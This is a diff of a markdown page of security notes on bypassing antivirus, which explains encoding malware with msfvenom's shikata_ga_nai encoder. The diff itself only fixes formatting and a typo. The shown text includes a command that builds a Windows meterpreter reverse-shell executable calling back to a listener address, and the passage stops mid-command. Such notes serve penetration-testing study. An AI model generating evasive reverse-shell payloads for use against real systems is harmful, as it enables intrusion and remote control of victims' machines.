xapax/security/bypassing_antivirus.md

 ### Encoding

 We can encode our malware in different ways.
 This can be done with msfvenom.
-Notice how we set the **-e** flag here, and then use the shikata_ga_nai encoding.
-This is not that effective since antivirus-vendors have access to meteasploit as well.
+Notice how we set the `-e` flag here, and then use the `shikata_ga_nai` encoding.
+This is not that effective since antivirus-vendors have access to metasploit as well.

 ```
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e